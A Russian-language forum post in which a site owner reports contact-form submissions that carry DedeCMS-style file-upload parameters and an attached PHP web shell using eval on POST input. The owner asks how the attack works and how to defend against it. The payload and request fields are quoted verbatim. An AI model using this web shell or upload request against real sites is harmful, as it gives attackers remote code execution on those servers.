Подозрительные письма

Всем привет!
На одном рабочем сайте есть простая форма заявки — телефон и имя. Работает через ajaxForm + FormIt.
Периодически через эту форму приходят письма с подобным содержанием:

cfg_softtype: php
cfg_mediatype: php
cfg_imgtype: php
cfg_not_allowall: txt
newname: asd.php
activepath: /data/cache/
f: form1.enclosure
cfg_basedir: ../../
job: upload
uploadfile: asd.php

Что интересно, в форме нет поля для файла, и не прописан enctype multipart/form-data. Но на почту, например, в этом письме, пришёл пхп-файл с содержанием:

<?php echo "dedecms";eval($_POST[0]);?>

Очевидно, что это какая-то попытка взлома. Но не совсем понятно, как именно это работает — вручную ли или автоматом, и какие могут быть последствия. Связано ли это с недавними взломами сайтов на модексе?
И главный вопрос — как защититься от такого?
Заранее спасибо за советы.